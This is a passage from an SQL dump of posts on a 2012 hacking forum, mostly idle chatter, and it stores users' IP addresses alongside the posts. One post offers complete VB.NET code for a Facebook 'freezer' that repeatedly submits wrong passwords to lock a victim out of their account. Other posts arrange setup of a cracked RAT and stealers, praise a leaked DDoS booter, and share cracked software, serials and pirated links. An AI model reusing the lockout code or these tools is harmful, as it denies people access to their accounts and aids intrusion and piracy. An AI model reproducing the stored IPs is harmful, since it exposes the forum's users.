'416597412', '1', '0', '0', '0', '1', '9943406643929cc4b38bc98361782419', '0', '0'); INSERT INTO mybb_posts VALUES('3273', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '82', 'iTzIpod', '1349305560', 'User is banned. Thread is junked.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b63ba3063b06cdbdf4150ac47f3ad644', '0', '0'); INSERT INTO mybb_posts VALUES('3274', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '82', 'iTzIpod', '1349307932', 'Can someone help me out? \n\n@Reloadzor? \nEtc. Someone..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '30bcbc1b208f7d6a3d40eb65d3794977', '0', '0'); INSERT INTO mybb_posts VALUES('3275', '656', '3270', '8', 'RE: why do ppl like this shitty song!?!?', '0', '203', 'NeonLights', '1349308646', '[quote=\'iTzIpod\' pid=\'3270\' dateline=\'1349305417\']\r\nI don\'t like this song either... :o\r\n[/quote]\r\n\r\nIKR\r\nall i hear is kids listening to this shit in the bus every morning\r\nits so dam enoying...', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '4e3d8997116a452b6245eb23674f1e20', '0', '0'); INSERT INTO mybb_posts VALUES('3276', '112', '283', '19', '[Junk]??? Ultimate Premium PPD Ebooks Give away ???', '0', '61', 'NXK', '1349309513', 'This thread has been junked.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3277', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '100', '??zg???g????61', '1349312804', '[quote=\'NeonLights\' pid=\'3266\' dateline=\'1349304798\']\r\ndude im blackhat...\r\nof course i can set it up for you\r\nbut i suggest using a RAT instead of a stealer \r\nfor more options and fun ;)\r\nor just stick with a direct email/keylogger\r\n[/quote]\r\n\r\n\r\n\r\nI have a cracked version of blackshades. (I think its cracked LOL) again I\'m on a mac, and VMware doesn\'t like me. I\'m having a lot of trouble setting it up, for some reason I\'m having port forwarding issues. To my knowledge, I do know how to port forward. I\'m PM\'ing you now, maybe we can do a team viewer/skype session ;D thanks bro!', '65.96.215.138', '1096865674', '1', '0', '100', '1349312889', '1', 'ace49f32dfab52c2492b299c67617674', '0', '1349312889'); INSERT INTO mybb_posts VALUES('3278', '656', '3267', '8', 'RE: why do ppl like this shitty song!?!?', '0', '1', 't3h jok3r', '1349317487', 'Moved to the right section.\n\nIt\'s basically the background music that attracts most people. It\'s a slow rap song and some listen to it to fit with the others.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cf5cf8ed37f5d9c85cabba2b3c0dd9ee', '0', '0'); INSERT INTO mybb_posts VALUES('3279', '652', '3206', '7', 'RE: Being CyberBullied', '0', '1', 't3h jok3r', '1349317626', 'Well they would have to sign up on this site to view the posts so they are pretty safe. Hey I didn\'t know most hackers are canadians ???', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '941673f334fa7164964e7366efb1ee47', '0', '0'); INSERT INTO mybb_posts VALUES('3280', '190', '665', '56', 'RE: Copy and paste game', '0', '1', 't3h jok3r', '1349317652', 'http://www.youtube.com/2012thevoiceof?feature=inp-lt-ype-63\n\nFirst presidential debate.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5449182d11ce37cd8d83cc3e2ff1ca54', '0', '0'); INSERT INTO mybb_posts VALUES('3281', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '1', 't3h jok3r', '1349317737', 'I didn\'t even that this thread was posted. Add something under your name.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '33fe43881460ca66f2df31fa92f6ad8f', '0', '0'); INSERT INTO mybb_posts VALUES('3282', '253', '1106', '56', 'RE: Count to 200', '0', '1', 't3h jok3r', '1349317860', '32. I have an Ipod Touch, the new Ipad and Iphone 5S :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '52f01162b6c15025e2ec2021780f3ba3', '0', '0'); INSERT INTO mybb_posts VALUES('3283', '649', '3179', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '1', 't3h jok3r', '1349317948', 'Thanks mothered and don\'t forget to vote for us in the link in my signature.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0087d7fb290d00afae421480b6149698', '0', '0'); INSERT INTO mybb_posts VALUES('3284', '655', '3253', '43', 'RE: ANY CS5 AND SOME CS4 ADOBE SERIALS', '0', '1', 't3h jok3r', '1349317995', '[mod]5. You cannot ask for or offer reputation in posts, signatures, or PM. This includes encouragement like \"reputation is appreciated\". \n[/mod]\n\nYou have 30 hours to update the thread and thanks for the service.', '72.231.24.165', '1223104677', '1', '0', '1', '1349459460', '1', '85631030a83227972ce37c1a2a6dff5a', '0', '1349459460'); INSERT INTO mybb_posts VALUES('3285', '654', '3234', '9', 'RE: Make money typing captchas', '0', '1', 't3h jok3r', '1349318211', '[quote=\'iTzIpod\' pid=\'3234\' dateline=\'1349263755\']\r\nAlrready posted this thread in the Monetizing Section.\r\n[/quote]\r\n\r\nI don\'t see your thread or is it in Unique?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '03e3536dff1e2de3b69719874ba95173', '0', '0'); INSERT INTO mybb_posts VALUES('3286', '658', '0', '52', '[Source]FB login + FB freezer using httpwebrequest', '0', '7', 'Romdu62', '1349319847', 'I\'ve Found a Way for Login into FaceBook Using HttpWebRequest\r\n\r\nBy Using This You Need\r\n\r\nTextboxs\r\nTextbox1 for Email\r\nTextbox2 For Password (put the PasswordChar to systemDefault)\r\nButton for Login\r\nOurs Imports :-\r\n[code]\r\nImports System.Net\r\nImports System.Text\r\nImports System.IO\r\n[/code]\r\n\r\nAfter the Public Class Form Add this :-\r\n[code]\r\nSub login(ByVal email As String, ByVal password As String)\r\n If TextBox1.Text = String.Empty AndAlso TextBox2.Text = String.Empty Then\r\n MsgBox(\"Put your email & password\", 0, \"Input data\")\r\n Else\r\n Dim postData As String = \"email=\" & email & \"&pass=\" & password & \"\"\r\n Dim tempcookies As New CookieContainer\r\n Dim encoding As New UTF8Encoding\r\n Dim byteData As Byte() = encoding.GetBytes(postData)\r\n Dim postreq As HttpWebRequest = DirectCast(HttpWebRequest.Create(\"https://www.facebook.com/login.php?iphone&next=http%3A%2F%2Ftouch.facebook.com%2Findex.php%3Feu%3DD0sS06p7LA4Jn5QzzqNH??Qg&refsrc=http%3A%2F%2Ftouch.facebook.com%2F\"), HttpWebRequest)\r\n postreq.Method = \"POST\"\r\n postreq.KeepAlive = True\r\n postreq.CookieContainer = tempcookies\r\n postreq.UserAgent = \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre\"\r\n postreq.ContentType = \"application/x-www-form-urlencoded\"\r\n postreq.Referer = \"http://touch.facebook.com/login.php?next=http%3A%2F%2Ftouch.facebook.com%2Findex.php%3Feu%3DD0sS06p7LA4Jn5??QzzqNHQg&refsrc=http%3A%2F%2Ftouch.facebook.com%2F&_rdr\"\r\n postreq.ContentLength = byteData.Length\r\n Dim postreqstream As Stream = postreq.GetRequestStream()\r\n postreqstream.Write(byteData, 0, byteData.Length)\r\n postreqstream.Close()\r\n Dim postresponse As HttpWebResponse\r\n postresponse = DirectCast(postreq.GetResponse, HttpWebResponse)\r\n tempcookies.Add(postresponse.Cookies)\r\n logincookie = tempcookies\r\n Dim postreqreader As New StreamReader(postresponse.GetResponseStream())\r\n Dim thepage As String = postreqreader.ReadToEnd\r\n If thepage.Contains(\"Incorrect email/password combination\") = True Then\r\n MsgBox(\"Incorrect email/password combination\", 0, \"Login error!\")\r\n Else\r\n MsgBox(\"Logged in\", 0, \"Success!\")\r\n End If\r\n If thepage.Contains(\"You have exceeded the number of invalid login attempts that we allow for your account\") = True Then\r\n MsgBox(\"You have exceeded the number of invalid login attempts\", 0, \"Max number of wrong logins\")\r\n End If\r\n End If\r\n End Sub\r\n[/code]\r\n\r\nClick the Button1 and Add this Code :-\r\n\r\n[code]\r\nlogin(TextBox1.Text, textbox2.text)\r\n[/code]\r\n\r\n========================================================\r\n\r\nYou Also Use it as the FaceBook Freezer By Using httpwebrequest it should be very fast\r\n\r\nPut this Code in Timer1_trick :-\r\n\r\n[code]\r\nlogin(TextBox1.Text, \"12312332112123\")\r\n[/code]\r\n\r\nFreezer Login Code :-\r\n\r\n[code]\r\nSub login(ByVal email As String, ByVal password As String)\r\n Dim postData As String = \"email=\" & email & \"&pass=\" & password & \"\"\r\n Dim tempcookies As New CookieContainer\r\n Dim encoding As New UTF8Encoding\r\n Dim byteData As Byte() = encoding.GetBytes(postData)\r\n Dim postreq As HttpWebRequest = DirectCast(HttpWebRequest.Create(\"https://www.facebook.com/login.php?iphone&next=http%3A%2F%2Ftouch.facebook.com%2Findex.php%3Feu%3DD0sS06p7LA4Jn5QzzqNH??Qg&refsrc=http%3A%2F%2Ftouch.facebook.com%2F\"), HttpWebRequest)\r\n postreq.Method = \"POST\"\r\n postreq.KeepAlive = True\r\n postreq.CookieContainer = tempcookies\r\n postreq.UserAgent = \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre\"\r\n postreq.ContentType = \"application/x-www-form-urlencoded\"\r\n postreq.Referer = \"http://touch.facebook.com/login.php?next=http%3A%2F%2Ftouch.facebook.com%2Findex.php%3Feu%3DD0sS06p7LA4Jn5??QzzqNHQg&refsrc=http%3A%2F%2Ftouch.facebook.com%2F&_rdr\"\r\n postreq.ContentLength = byteData.Length\r\n Dim postreqstream As Stream = postreq.GetRequestStream()\r\n postreqstream.Write(byteData, 0, byteData.Length)\r\n postreqstream.Close()\r\n Dim postresponse As HttpWebResponse\r\n postresponse = DirectCast(postreq.GetResponse, HttpWebResponse)\r\n tempcookies.Add(postresponse.Cookies)\r\n logincookie = tempcookies\r\n Dim postreqreader As New StreamReader(postresponse.GetResponseStream())\r\n Dim thepage As String = postreqreader.ReadToEnd\r\n If thepage.Contains(\"You have exceeded the number of invalid login attempts that we allow for your account\") = True Then\r\n MsgBox(\"The FaceBook account \" & (TextBox1.Text) & \" is Frozen\", MsgBoxStyle.OkOnly, \"Operation Successfull\")\r\n End If\r\n End Sub\r\n[/code]\r\n\r\nClick the Button1 and Add this Code :-\r\n\r\n[code]\r\nTimer1.Start()\r\n[/code]\r\n\r\nEnjoy!', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '20c135aa7a2e1497b1351eeb032dab85', '0', '0'); INSERT INTO mybb_posts VALUES('3287', '487', '2354', '56', 'RE: Corrupt a wish', '0', '7', 'Romdu62', '1349319915', 'Granted. People would call you a nerd whole life.\n\nI wish I was a Elite member.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '792f6f17afbecda817ab9e405f3e072a', '0', '0'); INSERT INTO mybb_posts VALUES('3288', '486', '2353', '56', 'RE: Guess how many?', '0', '7', 'Romdu62', '1349319955', 'I didn\'t even get that far lol', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '1636e8fa40a0e850d72d1ed20100ca6b', '0', '0'); INSERT INTO mybb_posts VALUES('3289', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '7', 'Romdu62', '1349319999', 'Now we are on 28.96 so way better than our previous records and i noticed that the stats aren\'t updating.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'bb273358445f5c35885e84b4ed7d9565', '0', '0'); INSERT INTO mybb_posts VALUES('3290', '197', '696', '56', 'RE: /me Thread', '0', '7', 'Romdu62', '1349320056', '/me likes the unique userbar and is glad Ipod is the leader.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'f316517665d4f195b80a5b0f752769b7', '0', '0'); INSERT INTO mybb_posts VALUES('3291', '238', '1021', '56', 'RE: Ban the user above you', '0', '7', 'Romdu62', '1349320087', 'Banned for having a l33thacking.net email.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '212a321b4b875070e13344caab59689b', '0', '0'); INSERT INTO mybb_posts VALUES('3292', '534', '2670', '23', 'RE: Manually Removing Viruses Through System Registry', '0', '7', 'Romdu62', '1349320171', 'Thanks Anonymous i\'m also looking forward for your guides.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '1cfc04e9a2ac8adbf9ffb854cbbf0016', '0', '0'); INSERT INTO mybb_posts VALUES('3293', '659', '0', '64', 'Stolen (2012) Movie RIP', '0', '5', 'Timmy', '1349320608', '[align=center][img]http://rebeccawangentertainment.files.wordpress.com/2012/09/stolen-2012-movie-poster-e1337273042255.jpg[/img][/align]\n\n[b]Description:[/b] A former thief frantically searches for his missing daughter, who has been kidnapped and locked in the trunk of a taxi\n[b]Movie Rating:[/b] 8\n[b]Genre:[/b] Action, Thriller\n\n[u][b]Links[/b][/u]\n\n[url=http://www.embedder.eu/frame.php?url=http://www.sockshare.com/file/F36F373F660B7AA0]Sockshare[/url]\n[url=http://www.embedder.eu/frame.php?url=http://www.putlocker.com/file/1F040C0B7FC268BA]Putlocker[/url]\n[url=http://skylo.me/vv.php?Id=5a510bcd4daca309b595eec6d652aac5]Skylo[/url]\n[url=http://fleon.me/vv.php?Id=c8a0398711930cdf1a2b6d91c9a001e9]Fleon[/url]\n\nEnjoy the movie!', '72.231.24.165', '1223104677', '1', '0', '5', '1349320630', '1', 'ed62229a41940b9a15d2f2b6ec260dd1', '0', '1349320630'); INSERT INTO mybb_posts VALUES('3294', '652', '3279', '7', 'RE: Being CyberBullied', '0', '2', 'Apathy', '1349320746', '[quote=\'t3h jok3r\' pid=\'3279\' dateline=\'1349317626\']\r\nWell they would have to sign up on this site to view the posts so they are pretty safe. Hey I didn\'t know most hackers are canadians ???\r\n[/quote]\r\n\r\nUnit is true well most people think we just drink beer, ride polar bears and stay in a igloo what we really do is use the igloo to keep the room cool fro us using the computer to hack too much.', '173.206.177.26', '-1378963174', '0', '0', '0', '0', '1', '40cf054ed8c391823d7312d5020320dc', '0', '0'); INSERT INTO mybb_posts VALUES('3295', '650', '3193', '61', 'RE: [LEAK] ShockwaveBooter (V4.2) [FREE]', '0', '5', 'Timmy', '1349320807', 'I agree with both of you and thanks for this booter.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd1cf6b17e8c8cd9445e0aa7e0c43cf2c', '0', '0'); INSERT INTO mybb_posts VALUES('3296', '652', '3294', '7', 'RE: Being CyberBullied', '0', '61', 'NXK', '1349320837', '[quote=\'Apathy\' pid=\'3294\' dateline=\'1349320746\']\r\n[quote=\'t3h jok3r\' pid=\'3279\' dateline=\'1349317626\']\r\nWell they would have to sign up on this site to view the posts so they are pretty safe. Hey I didn\'t know most hackers are canadians ???\r\n[/quote]\r\n\r\nUnit is true well most people think we just drink beer, ride polar bears and stay in a igloo what we really do is use the igloo to keep the room cool fro us using the computer to hack too much.\r\n[/quote]\r\nI do ride polar bars and live in igloos and drink beer all day though :(', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'cb8ab6e49774ec95b9cd0a5fdcc4b46c', '0', '0'); INSERT INTO mybb_posts VALUES('3297', '649', '3179', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '5', 'Timmy', '1349320849', 'thanks for mentioning my username and i voted for l33thacking already', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b4a7bedad573a49028434ac59661f8c1', '0', '0'); INSERT INTO mybb_posts VALUES('3298', '487', '3287', '56', 'RE: Corrupt a wish', '0', '2', 'Apathy', '1349321018', '[quote=\'Romdu62\' pid=\'3287\' dateline=\'1349319915\']\r\nGranted. People would call you a nerd whole life.\r\n\r\nI wish I was a Elite member.\r\n[/quote]\r\n\r\nGranted. You would be awesome for your whole life. D:\r\n\r\nI wish I could protect those close to me from everything.', '173.206.177.26', '-1378963174', '0', '0', '0', '0', '1', '1e887e9f459c23fd7cf0cb36eb4aeb3f', '0', '0'); INSERT INTO mybb_posts VALUES('3299', '645', '3154', '30', 'RE: [GET] Acunetix Web Vulnerability Scanner CE v8.0.20120305 Cracked !', '0', '1', 't3h jok3r', '1349323206', 'Honestly no but the instructions on cracking it and using it are known and I have followed the instructions on a different version was successful.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '31bb951568c4dc206168ea4d7d5e6143', '0', '0'); INSERT INTO mybb_posts VALUES('3300', '660', '0', '30', 'Vulcan Private Logger', '0', '5', 'Timmy', '1349323439', '[align=center][img]http://gyazo.com/f7026470baa697100b9bb6d60394d5c6.png?1348625841[/img]\r\n\r\n[url=http://elementscanner.net//?RE=e71a1800c268597561374acf065042a6][img]http://elementscanner.net//image.php?ID=e71a1800c268597561374acf065042a6[/img][/url]\r\n\r\n[url=http://www.mediafire.com/?08cqcy82htoc4k3][img]http://img254.imageshack.us/img254/9947/downloadnow.png[/img][/url]\r\n\r\nOfficial Download Page: http://vulcantools.net/index.php?mod=survey_tools&tool=Vulcan_Logger\r\n[/align]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7ede7589b96ac5da8a4808a792e8165f', '0', '0'); INSERT INTO mybb_posts VALUES('3301', '487', '2354', '56', 'RE: Corrupt a wish', '0', '3', '??????????¢™', '1349324903', 'Wish Granted, but you died in a car accident and now you cant protect anyone.\n\nI wish I had a domain name and hosting so I could make a forum and partner with LH.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', 'f370261cdabb36c85692340ccb87ed50', '0', '0'); INSERT INTO mybb_posts VALUES('3302', '654', '3226', '9', 'RE: Make money typing captchas', '0', '3', '??????????¢™', '1349325013', 'How much could you get from doing this. BTW I have seen this somewhere but I dont remember if it was here or on another forum.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '4b0bc541e3d212490866fa174665fcdd', '0', '0'); INSERT INTO mybb_posts VALUES('3303', '661', '0', '50', 'Bullshit', '0', '3', '??????????¢™', '1349325207', '[b]I am making this complaint because I got removed from staff for nothing. Maybe its because I didnt post (because I wasnt home) or something. Well JakeUS who is a Mod didnt get removed from his position and I havent seen him post since I got here. Tell me why. COMPLETE BS.[/b]', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '84a487636cb0ec4edbc67392b5c7ee0f', '0', '0'); INSERT INTO mybb_posts VALUES('3304', '643', '3116', '7', 'RE: L33thakcers.com members here?', '0', '3', '??????????¢™', '1349325377', 'I have never heard of it but this forum is probably much more better than that. You should make this your home.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '8d36b01f92fd8752cb240c489dd2ebcd', '0', '0'); INSERT INTO mybb_posts VALUES('3305', '51', '133', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '3', '??????????¢™', '1349325440', 'FUCK THE POLICE OR WHATEVER, I STILL USE GOOGLE FOR EVERYTHING.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '5cda3361de2ce70caece6c54e4b6a8fe', '0', '0'); INSERT INTO mybb_posts VALUES('3306', '662', '0', '7', 'Is this how you treat me?', '0', '3', '??????????¢™', '1349325643', '[b]Okay so today I get on to make posts and guess what, I am not staff anymore. Hmm maybe its because I didnt post for 1 fucking day (because I wasnt here) or something. May I ask why is JakeUS still a Mod and I havent seen him make 1 post since I came back. I got one question, Is this how you treat an original admin/member? This is complete BBSSSSSSSSS.[/b]', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '054edb5a47d085b55dd34336feee148b', '0', '0'); INSERT INTO mybb_posts VALUES('3307', '622', '3249', '42', 'RE: Founder of the Pirate Bay Gottfrid Svartholm Arrested in Cambodia', '0', '3', '??????????¢™', '1349325808', '[quote=\'mothered\' pid=\'3249\' dateline=\'1349269033\']\r\nIsn\'t he the one who has since declared himself bankrupt?\r\n\r\nThe Pirate Bay has been down for a few days now (still Is at the time of this post). Google It and read the news. It\'s quite Interesting.\r\n[/quote]\r\n\r\nThe Pirate bay is not down for me, I am in the US. http://thepiratebay.se/', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '05986846530956ae52effb53fd7a2ec1', '0', '0'); INSERT INTO mybb_posts VALUES('3308', '584', '2846', '24', 'RE: Windows 8, will you switch over?', '0', '3', '??????????¢™', '1349325897', 'If I had the money to I would but I dont have money for that.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '56211eef36c230eee7193be9ca605a5e', '0', '0'); INSERT INTO mybb_posts VALUES('3309', '607', '2942', '7', 'RE: Wanna laugh?', '0', '3', '??????????¢™', '1349325990', 'I header all these jokes a while ago. Sorry to say OP but these are old.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '1337105b7b261e43d75734e744805dec', '0', '0'); INSERT INTO mybb_posts VALUES('3310', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '205', 'mothered', '1349326521', 'Just want to say thanks for providing the code.\r\n\r\nMuch appreciated.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '65652d529386aa55c724787d55ccaef6', '0', '0'); INSERT INTO mybb_posts VALUES('3311', '643', '3304', '7', 'RE: L33thakcers.com members here?', '0', '205', 'mothered', '1349326702', '[quote=\'??????????¢™\' pid=\'3304\' dateline=\'1349325377\']\r\nI have never heard of it but this forum is probably much more better than that. You should make this your home.\r\n[/quote]\r\n\r\nI fully agree.\r\n\r\nThis forum Is certainly better, hence one of many reasons why I choose to hang out here.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '49dd1d5d054f5a7e214c83faf9495031', '0', '0'); INSERT INTO mybb_posts VALUES('3312', '654', '3226', '9', 'RE: Make money typing captchas', '0', '205', 'mothered', '1349326840', 'I didn\'t know this methodology existed to make money online.\r\n\r\nWhat sort of payments are we looking at?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '687709e06b74d20256b6554478e4083e', '0', '0'); INSERT INTO mybb_posts VALUES('3313', '622', '3307', '42', 'RE: Founder of the Pirate Bay Gottfrid Svartholm Arrested in Cambodia', '0', '205', 'mothered', '1349326971', '[quote=\'??????????¢™\' pid=\'3307\' dateline=\'1349325808\']\r\n\r\n\r\nThe Pirate bay is not down for me, I am in the US. http://thepiratebay.se/\r\n[/quote]\r\n\r\nYeah, It was down at the time of my post yesterday.\r\n\r\nAround 3 hours before your post here, It was up and running again for everyone.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd00aa85245cf2d5fdd7403baca6245e0', '0', '0'); INSERT INTO mybb_posts VALUES('3314', '656', '3267', '8', 'RE: why do ppl like this shitty song!?!?', '0', '205', 'mothered', '1349327133', 'Personally, I think It\'s just plain annoying.\r\n\r\nDifferent people acquire different tastes, hence our opinions vary.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '76031963b560497c09ccdf4560c2a726', '0', '0'); INSERT INTO mybb_posts VALUES('3315', '603', '3310', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1349327180', '[quote=\'mothered\' pid=\'3310\' dateline=\'1349326521\']\r\nJust want to say thanks for providing the code.\r\n\r\nMuch appreciated.\r\n[/quote]\r\n\r\nNo problem man, Just contributing to the community.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', 'e098a0245314859099d2cf07316f88f6', '0', '0'); INSERT INTO mybb_posts VALUES('3316', '659', '3293', '64', 'RE: Stolen (2012) Movie RIP', '0', '205', 'mothered', '1349327252', 'I\'ve actually heard some positive reviews on this. I do like movies of this nature.\r\n\r\nI\'m hoping to allocate time to watch It.\r\nThanking you.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'cd26ac762d130a2d8b1e0d021ab136a7', '0', '0'); INSERT INTO mybb_posts VALUES('3317', '622', '3313', '42', 'RE: Founder of the Pirate Bay Gottfrid Svartholm Arrested in Cambodia', '0', '3', '??????????¢™', '1349327610', '[quote=\'mothered\' pid=\'3313\' dateline=\'1349326971\']\r\n[quote=\'??????????¢™\' pid=\'3307\' dateline=\'1349325808\']\r\n\r\n\r\nThe Pirate bay is not down for me, I am in the US. http://thepiratebay.se/\r\n[/quote]\r\n\r\nYeah, It was down at the time of my post yesterday.\r\n\r\nAround 3 hours before your post here, It was up and running again for everyone.\r\n[/quote]\r\nOh okay, well it havent been down for me. I go to it everyday.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '52ebe4ad55fe9551e438ec0d2931acd1', '0', '0'); INSERT INTO mybb_posts VALUES('3318', '584', '2846', '24', 'RE: Windows 8, will you switch over?', '0', '205', 'mothered', '1349327639', 'You can download the Windows 8 Enterprise Edition (RTM), with a 90 day trial.\r\n\r\nI\'ve actually activated my Windows 8 Pro Edition, via an offline activation methodology. I believe the method Is no longer working, and has been detected by Microsoft. Mine Is still up and running nicely. I\'ll be working on an activator soon (when time permits), so It shouldn\'t be too far away.\r\n\r\nThere\'s other methods to remove the \"Product ID\", thus no checks can be performed by Microsoft to render It useless. I have this method running on another lappy, and all Is well.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '5da00837f0dff79e59bb76d0f2b3791b', '0', '0'); INSERT INTO mybb_posts VALUES('3319', '584', '3318', '24', 'RE: Windows 8, will you switch over?', '0', '3', '??????????¢™', '1349328424', '[quote=\'mothered\' pid=\'3318\' dateline=\'1349327639\']\r\nYou can download the Windows 8 Enterprise Edition (RTM), with a 90 day trial.\r\n\r\nI\'ve actually activated my Windows 8 Pro Edition, via an offline activation methodology. I believe the method Is no longer working, and has been detected by Microsoft. Mine Is still up and running nicely. I\'ll be working on an activator soon (when time permits), so It shouldn\'t be too far away.\r\n\r\nThere\'s other methods to remove the \"Product ID\", thus no checks can be performed by Microsoft to render It useless. I have this method running on another lappy, and all Is well.\r\n[/quote]\r\nI really want to get this but I want to get the full version free not a trial.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '2510117b0f13beb13d7d13a932082bdf', '0', '0'); INSERT INTO mybb_posts VALUES('3320', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '214', 'Rave™', '1349347214', 'Could I have this? Thanks. AND STOP WITH THE FUCKING POST AND PM', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '186b50a1525bd77e778f094bc3bbf1d6', '0', '0'); INSERT INTO mybb_posts VALUES('3321', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349351691', 'http://www.facebook.com/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bf54f95b0c18d8ab2d2a88184ccf397b', '0', '0'); INSERT INTO mybb_posts VALUES('3322', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '82', 'iTzIpod', '1349351732', 'Like what though ?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ca9ac66ae0d28b87d21fee34cabac28d', '0', '0'); INSERT INTO mybb_posts VALUES('3323', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349351763', '33. Like a boss.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '21d755e8031cf8edc95fa621a523eca3', '0', '0'); INSERT INTO mybb_posts VALUES('3324', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1349351838', '/me thanks Romdu62 for a kind comment.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2152784da73f109b579419eeb4e88c4d', '0', '0'); INSERT INTO mybb_posts VALUES('3325', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1349351868', 'Banned for not having a @L33tHacking.net email', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2a70051c865c20cb3cde5e9cf8ebe07b', '0', '0'); INSERT INTO mybb_posts VALUES('3327', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '82', 'iTzIpod', '1349351997', 'I saw some immature posts by you. But still I don\'t know. I wasn\'t on that much yesterday. But I still posted for sure atleast 5+ posts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '501f5f3ede0071250a93ee83fe4d06fe', '0', '0'); INSERT INTO mybb_posts VALUES('3328', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '2', 'Apathy', '1349352036', 'I would restart honestly. Needs to have the render blend more and this is WAYYYY to much empty space. Keep trying. :P', '173.206.177.26', '-1378963174', '0', '0', '0', '0', '1', 'f68ff586f116e6ef282c85c526f7b872', '0', '0'); INSERT INTO mybb_posts VALUES('3329', '654', '3226', '9', 'RE: Make money typing captchas', '0', '82', 'iTzIpod', '1349352046', 'I don\'t know. I just remember I posted this thread... Not even sure now... :/\n\nDid it get deleted?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'abf65b515d8611fac6dffa775ebd79cd', '0', '0'); INSERT INTO mybb_posts VALUES('3330', '622', '3317', '42', 'RE: Founder of the Pirate Bay Gottfrid Svartholm Arrested in Cambodia', '0', '205', 'mothered', '1349356153', '[quote=\'??????????¢™\' pid=\'3317\' dateline=\'1349327610\']\r\n\r\nOh okay, well it havent been down for me. I go to it everyday.\r\n[/quote]\r\n\r\nYou couldn\'t have been on It everyday. It was definitely down.\r\n\r\nRead this: http://www.wptv.com/dpp/news/national/pirate-bay-outage-popular-torrent-website-explains-cause-of-temporary-outage-this-week', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '12e0e7cef21428d925007081648da8aa', '0', '0'); INSERT INTO mybb_posts VALUES('3331', '661', '3303', '50', 'RE: Bullshit', '0', '61', 'NXK', '1349360331', 'PM Jok3r about this.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '1e8066ca3c022e3382573dcf3dbb5373', '0', '0'); INSERT INTO mybb_posts VALUES('3332', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '61', 'NXK', '1349362386', 'You haven\'t contributed anything at all why are you freaking out I don\'t get it. \n\nYou\'ve literally done nothing.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'a4d9f4afa08c7de387df442a0b3e684f', '0', '0'); INSERT INTO mybb_posts VALUES('3333', '643', '3116', '7', 'RE: L33thakcers.com members here?', '0', '216', 'o_o', '1349363635', 'I thought that 